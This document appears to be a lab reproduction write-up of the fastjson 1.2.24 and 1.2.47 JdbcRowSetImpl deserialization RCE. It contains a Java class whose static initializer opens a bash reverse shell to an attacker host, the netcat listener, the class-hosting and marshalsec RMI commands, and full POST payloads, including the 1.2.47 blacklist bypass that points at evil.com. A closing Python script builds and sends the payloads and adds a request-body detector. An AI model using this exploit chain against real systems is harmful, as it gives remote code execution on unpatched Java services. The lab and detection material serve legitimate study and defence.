Introduction to fastjson
fastjson is Alibaba's open-source JSON library for Java. It parses JSON text, serializes Java Beans to JSON strings, and deserializes JSON strings back into Java Beans. The deserializer honours a special "@type" key that names the class to instantiate, which is what the vulnerability below abuses.
Affected versions
fastjson <= 1.2.24 (1.2.25 introduced the autoType blacklist, with autoTypeSupport disabled by default)
Vulnerability reproduction
Start the vulhub environment with docker-compose:
cd /app/vulhub-20201028/fastjson/1.2.24-rce
docker-compose up -d
Once the image has been pulled and the container is up, visit IP:8090 and you should see a JSON-formatted response:
http://192.168.1.38:8090
Create TouchFile.java and compile it to a class file. The payload lives in the class's static initializer, so it runs the moment the target JVM loads the class, without any method being called. Before triggering it, start a listener on the attacker host (192.168.1.43) for port 4444, e.g. nc -lvnp 4444.
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
    // Static initializer: executed when the class is loaded by the target JVM.
    static {
        try {
            Runtime r = Runtime.getRuntime();
            // Reverse shell back to the attacker's listener on 192.168.1.43:4444.
            Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.43/4444 0>&1"});
            p.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}
javac TouchFile.java
Compile with a JDK whose class-file version the target's JVM accepts (the vulhub image runs Java 8); on a newer JDK use javac --release 8 TouchFile.java, otherwise the target will reject the class with an UnsupportedClassVersionError and nothing happens.
Serve the compiled class over HTTP from the directory that contains TouchFile.class (Python 2 shown; with Python 3 use python3 -m http.server 1234):
python -m SimpleHTTPServer 1234
http://192.168.1.43:1234/TouchFile.class
Then use the marshalsec project to start an RMI server listening on port 9999 that answers lookups of TouchFile with a reference to the remote class on the HTTP server:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.43:1234/#TouchFile" 9999
Send the request to the target. fastjson resolves "@type" to com.sun.rowset.JdbcRowSetImpl, instantiates it and calls the setters for the remaining keys; setAutoCommit calls connect(), which performs an InitialContext.lookup() on dataSourceName. The RMI server replies with a Reference whose codebase is the Python HTTP server, so the target JVM downloads TouchFile.class, runs its static initializer and connects back to the listener. This chain only works while the target JVM still trusts remote codebases for RMI references (com.sun.jndi.rmi.object.trustURLCodebase defaulted to true before JDK 8u121), which is why the vulhub image pins an old JDK.
POST / HTTP/1.1
Host: 192.168.1.38:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 162
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.1.43:9999/TouchFile",
"autoCommit":true
}
}
An equivalent request that sets Content-Type explicitly. The dataSourceName must point at the RMI server you started: this packet uses rmi://192.168.1.38:8888/TouchFile, so adjust the host and port to match your marshalsec listener (192.168.1.43:9999 above).
POST / HTTP/1.1
Host: 192.168.1.38:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 162
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.1.38:8888/TouchFile",
"autoCommit":true
}
}
Differences between reproducing 1.2.47 and 1.2.24
Only the payload sent to the target server differs; every other step is the same. 1.2.25 added an autoType blacklist (autoTypeSupport is off by default) that rejects com.sun.rowset.JdbcRowSetImpl when it appears directly in "@type". The 1.2.47 payload gets around it: java.lang.Class is always allowed and is deserialized by MiscCodec, which calls TypeUtils.loadClass on the "val" string with caching enabled, so the gadget class is placed in the mappings cache. When "b" is parsed, checkAutoType consults that cache before the blacklist and returns the cached class. The "a" object must therefore precede "b". This was fixed in 1.2.48. 1.2.47 payload:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://evil.com:9999/Exploit",
"autoCommit":true
}
}
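The following Python script is an added example, not code from the original writeup or from fastjson. It builds both request bodies shown above (the plain 1.2.24 payload and the 1.2.47 variant with the java.lang.Class cache-poisoning entry), can POST them to the lab target, and includes a small detector that classifies a request body by walking it for "@type" keys. The addresses (192.168.1.43:9999 for the marshalsec listener, 192.168.1.38:8090 for the target) are taken from the writeup; the classification labels are this example's own.

```python
"""Added example: build, send and detect the fastjson JdbcRowSetImpl payloads."""
import json
import urllib.request

# The gadget fastjson instantiates via @type. Setting autoCommit calls connect(),
# which does a JNDI lookup of dataSourceName and loads the attacker's class.
GADGET = "com.sun.rowset.JdbcRowSetImpl"


def build_payload(rmi_url, bypass_1247=False):
    """Return the JSON request body.

    rmi_url: the marshalsec RMI reference, e.g. "rmi://192.168.1.43:9999/TouchFile".
    bypass_1247: prepend the java.lang.Class entry used against 1.2.25-1.2.47; its
    "val" is loaded through TypeUtils.loadClass with caching on, so the later @type
    lookup hits the mappings cache before the autoType blacklist is consulted.
    Key order matters: "a" must be parsed before "b" (dicts keep insertion order).
    """
    body = {}
    if bypass_1247:
        body["a"] = {"@type": "java.lang.Class", "val": GADGET}
    body["b"] = {"@type": GADGET, "dataSourceName": rmi_url, "autoCommit": True}
    return json.dumps(body)


def send(target_url, payload, timeout=5):
    """POST the payload with the Content-Type the vulhub target expects."""
    req = urllib.request.Request(
        target_url, data=payload.encode(), method="POST",
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status, resp.read().decode(errors="replace")


def find_autotype(node, path="$"):
    """Yield (json_path, object) for every JSON object carrying an @type key."""
    if isinstance(node, dict):
        if "@type" in node:
            yield path, node
        for key, value in node.items():
            yield from find_autotype(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from find_autotype(value, f"{path}[{i}]")


def classify(body_text):
    """Classify a request body for a WAF or IDS rule.

    Labels (this example's own): 'not-json', 'clean' (no @type at all),
    'autotype' (some @type present), 'jndi-gadget' (JdbcRowSetImpl pointing at
    rmi:// or ldap://), 'jndi-gadget+class-cache' (the 1.2.47 bypass shape).
    """
    try:
        doc = json.loads(body_text)
    except ValueError:
        return "not-json"
    hits = list(find_autotype(doc))
    if not hits:
        return "clean"
    jndi = any(
        obj.get("@type") == GADGET
        and str(obj.get("dataSourceName", "")).lower().startswith(("rmi://", "ldap://"))
        for _, obj in hits)
    class_cache = any(
        obj.get("@type") == "java.lang.Class" and "val" in obj for _, obj in hits)
    if jndi and class_cache:
        return "jndi-gadget+class-cache"
    if jndi:
        return "jndi-gadget"
    return "autotype"


if __name__ == "__main__":
    # Addresses from the writeup; the RMI server is the marshalsec listener.
    p24 = build_payload("rmi://192.168.1.43:9999/TouchFile")
    p47 = build_payload("rmi://192.168.1.43:9999/TouchFile", bypass_1247=True)
    print(p24, "->", classify(p24))
    print(p47, "->", classify(p47))
    # send("http://192.168.1.38:8090/", p24)  # fires the reverse shell against the lab target
```

The detector parses the body with a real JSON parser rather than grepping for the literal string "@type", so the usual unicode-escape tricks ("\u0040type") are normalised before the check. It is a triage aid, not a replacement for upgrading fastjson.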